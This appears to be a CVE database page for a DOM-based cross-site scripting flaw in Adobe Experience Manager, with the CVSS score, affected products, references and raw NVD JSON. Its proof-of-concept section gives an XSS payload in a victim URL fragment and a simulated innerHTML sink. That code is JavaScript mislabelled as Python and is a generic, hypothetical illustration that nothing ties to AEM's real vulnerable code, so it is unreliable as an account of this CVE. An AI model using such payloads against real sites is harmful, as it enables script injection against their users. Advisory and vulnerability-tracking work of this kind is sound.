CVE-2026-34624

Description

Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:* - VULNERABLE

Adobe Experience Manager <= 6.5.24

Adobe Experience Manager <= FP11.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for DOM-based XSS in Adobe Experience Manager
// Attacker constructs a malicious URL containing a payload in the fragment or parameter

let payload = "<img src=x onerror=alert('CVE-2026-34624-XSS')>";
let targetUrl = "https://victim-site.com/content/path.html#" + encodeURIComponent(payload);

// Simulation of the vulnerable sink
// If the application takes window.location.hash and uses innerHTML without sanitization:
function vulnerableSink(hash) {
    // Vulnerable code: direct insertion of untrusted data into DOM
    document.getElementById('userContent').innerHTML = hash;
}

// When the victim visits the URL, the following happens:
console.log("Attacker sends link: " + targetUrl);
// victim visits -> browser executes vulnerableSink(window.location.hash)
// alert box pops up

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34624
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34624
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34624/
[4] VulDB https://vuldb.com/cve/CVE-2026-34624
[5] https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34624", "sourceIdentifier": "[email protected]", "published": "2026-04-14T19:16:38.087", "lastModified": "2026-04-15T19:42:05.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndIncluding": "6.5.24.0", "matchCriteriaId": "5898EACB-FA50-4AED-9248-9D4FBFD558D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.11.8", "matchCriteriaId": "CE7B652E-C71C-42E0-950D-59CABCE683CE"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}